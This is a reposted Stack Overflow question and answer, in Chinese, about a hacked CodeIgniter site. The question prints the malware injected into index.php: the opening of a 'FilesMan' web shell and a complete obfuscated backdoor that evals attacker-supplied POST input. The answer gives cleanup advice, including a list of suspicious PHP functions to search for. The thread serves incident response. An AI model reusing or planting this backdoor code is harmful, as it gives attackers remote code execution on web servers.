gpt4 book ai didi

php - Codeigniter 应用程序遭到黑客攻击,代码注入(inject)到 index.php 中

转载 作者:行者123 更新时间:2023-12-02 21:01:35 24 4
gpt4 key购买 nike

我有一个 codeigniter 2.0.2 项目,一直被黑客攻击。主要有两个问题:

  • 恶意代码被添加到 index.php 的开头文件
  • 恶意文件已添加到服务器

根据主机的说法,没有 FTP 日志表明这些文件已上传。

  1. 由于没有与恶意文件相关的 FTP 上传日志 - 这是否意味着它一定是通过网站本身进行的利用,例如联系方式或上传表单?

  2. 该网站位于共享托管上 - 同一服务器上的网站代码也遭到黑客攻击,这导致了问题?

  3. 如果我将index.php 的文件名更改为其他名称会有帮助吗?

  4. 作为 index.php正在被修改,我应该将其 CHMOD 为 644 吗?

  5. 我一直在寻找 codeigniter 项目的建议权限,但尚未找到任何来源。我认为除了上传/日志目录 (777) 之外,整个网站的 644 - 这听起来不错吗?

代码注入(inject)到 index.php 的顶部文件:

<?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-

随后是一个带有长编码字符串的长 preg_replace 语句。接下来是第二条声明:

if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);}

有一个联系表单和一个用户可以使用 CKFinder 2.0.1 上传项目的表单。将更新此问题并查看是否可以解决问题。

最佳答案

您可以执行以下操作:

  • 检查日志文件中是否有对具有奇怪或不熟悉名称的文件的 POST 请求,例如.cache_123.php - 这些可能是后门脚本,特别是以点开头的文件名,从而将其隐藏在(常规)文件系统中。
  • 下载完整的实时网站并在网站范围内搜索 base64_decodeexecpreg_replacepassthru 等内容系统shell_execevalFilesMan
  • 通过防病毒软件(AVG、Avast 等)运行来检查整个(实时下载的)网站
  • 如果可能的话,chmod 上传目录 775 而不是 777

关于php - Codeigniter 应用程序遭到黑客攻击,代码注入(inject)到 index.php 中,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/12264125/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com